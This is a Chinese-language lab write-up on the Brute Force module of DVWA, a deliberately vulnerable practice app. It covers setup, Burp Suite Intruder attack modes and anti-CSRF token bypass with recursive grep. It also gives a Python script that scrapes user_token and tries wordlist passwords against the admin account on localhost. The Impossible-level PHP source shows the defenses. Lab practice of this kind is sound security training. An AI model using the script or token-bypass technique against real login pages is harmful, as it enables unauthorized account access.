DVWA-Brute Force

配置环境

将下载的DVWA放在www目录下，然后复制一份/config/config.inc.php.dist到当前目录，并且去掉.dist。
在phpMyadmin如果没有表dvwa，则新建一个表dvwa

db_user,db_password是数据库的账号和密码

之后找到DVWA的路径，找到下面的create/reset database点击（再次进入phpMyadmin查看表dvwa，表中已经有数据，密码用md5加密），等2秒自动跳转登录页面

输入账号admin,密码password


如果有乱码的情况

到DVWA安装目录下（…/WWW/DVWA-master/dvwa/includes）寻找文件dvwaPage.inc.php

打开这个文件，然后在全文查找charset=utf-8，将所有utf-8修改为gb2312。

注意：有好几处charset=utf-8，要全部修改成charset=gb2312。记得保存。

Brute Force

安全级别：Low

随便输入，然后抓包

send to intruder


选择破解参数并选择破解方式

四种暴力破解方式的区别：

一个字典，两个参数，先匹配第一项，再匹配第二项【sniper】

一个字典，两个参数，同用户名同密码【battering ram】

两个字典，两个参数，同行匹配，短的截止【pitch fork】

两个字典，两个参数，交叉匹配，所有可能【cluster bomb】

长度不一样的有可能是正确的

成功了

使用sql注入的方式也可以

安全级别：Medium

先看源码，过滤掉了mysql语句中的字符

mysql_real_excape_string()函数转义sql语句中使用的字符串中的特殊字符，防止sql注入；

同时对密码进行了md5加密，杜绝通过参数password进行sql注入的可能性

但是没有加入有效的防爆破机制

使用sql注入，但是失败了

使用上关的爆破步骤

安全级别：High

参考源码

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符；

stripslashes() 函数删除由 addslashes() 函数添加的反斜杠，可用于清理从数据库中或者从 HTML表单中取回的数据；

破解过程

通过抓包，我们发现了需要提交四个参数：username,password,login,user_token

每次服务器返回的登陆页面中都会包含一个随机的user_token的值，用户每次登录时都要将user_token一起提交。服务器收到请求后，会优先做token的检查

可以尝试使用python脚本，使用爬虫将服务器每次返回的user_token抓取到

1.使用burp suit破解

设置两个参数password和user_token，攻击类型为pitchfork

设置参数，在option选项卡中将攻击线程thread设置为1，因为Recursive_Grep模式不支持多线程攻击，然后选择Grep-Extract,意思是用于提取响应消息中的有用信息，点击add，最后将Redirections设置为always



然后设置payload，第一个参数设置不在赘述，第二个参数选择Recursive grep，然后将options中的token作为第一次请求的初始值

start attack，结果如下

2.利用python脚本对password参数进行爆破

from bs4 import BeautifulSoup
from urllib.request import Request,urlopen

header = {
    'Host': '127.0.0.1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'close',
    'Referer': 'http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/brute/',
    'Cookie': 'security=high; PHPSESSID=b9d2b7ee1eaeb87cf2f84b6cd173ff2a',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-User': '?1'
}
requrl = "http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/brute/"


def get_token(requrl, header):
    req = Request(url=requrl, headers=header)
    response = urlopen(req)
    print(response.getcode())
    the_page = response.read().decode()
    # print(the_page)
    print(len(the_page))
    soup = BeautifulSoup(the_page, "html.parser")
    # print '###################'
    # print soup.find_all('input')[3].get('value')
    user_token = soup.find_all('input')[3].get('value')
    # user_token = soup.form.input.input.input.input["value"]
    return user_token


user_token = get_token(requrl, header)
i = 0
for line in open('./password.txt'):
    requrl = "http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/brute/" + "?username=admin&password=" + line.strip() + "&Login=Login&user_token=" + user_token
    i = i + 1
    print(i, 'admin', line.strip())
    user_token = get_token(requrl, header)
    print(user_token)
    if i == 10:
        break

安全级别：Impossible

<?php

if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {
    // Check Anti-CSRF token -------校验token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input----------过滤、转义用户输入的username
    $user = $_POST[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input----------过滤、转义用户输入的password
    $pass = $_POST[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Default values
    $total_failed_login = 3;
    $lockout_time       = 15;
    $account_locked     = false;

    // Check the database (Check user information)
    // 用了更为安全的PDO（PHP Data Object）机制防御sql注入，这是因为不能使用PDO扩展本身执行任何数据库操作，而sql注入的关键就是通过破坏sql语句结构执行恶意的sql命令  
    $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // Check to see if the user has been locked out.----登录失败锁定机制：3次失败，锁定15分钟
    if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
        // User locked out.  Note, using this method would allow for user enumeration!
        //echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";

        // Calculate when the user would be allowed to login again
        $last_login = strtotime( $row[ 'last_login' ] );
        $timeout    = $last_login + ($lockout_time * 60);
        $timenow    = time();

        /*
        print "The last login was: " . date ("h:i:s", $last_login) . "<br />";
        print "The timenow is: " . date ("h:i:s", $timenow) . "<br />";
        print "The timeout is: " . date ("h:i:s", $timeout) . "<br />";
        */

        // Check to see if enough time has passed, if it hasn't locked the account
        if( $timenow < $timeout ) {
            $account_locked = true;
            // print "The account is locked<br />";
        }
    }

    // Check the database (if username matches the password)----尝试登录，PDO机制防御SQL注入
    $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR);
    $data->bindParam( ':password', $pass, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // If its a valid login...
    if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
        // Get users details
        $avatar       = $row[ 'avatar' ];
        $failed_login = $row[ 'failed_login' ];
        $last_login   = $row[ 'last_login' ];

        // Login successful
        echo "<p>Welcome to the password protected area <em>{$user}</em></p>";
        echo "<img src=\"{$avatar}\" />";

        // Had the account been locked out since last login?
        if( $failed_login >= $total_failed_login ) {
            echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
            echo "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
        }

        // Reset bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    } else {
        // Login failed----如果登录失败，随机等待2-4秒后再返回错误信息
        sleep( rand( 2, 4 ) );

        // Give the user some feedback
        echo "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";

        // Update bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    }

    // Set the last login time
    $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>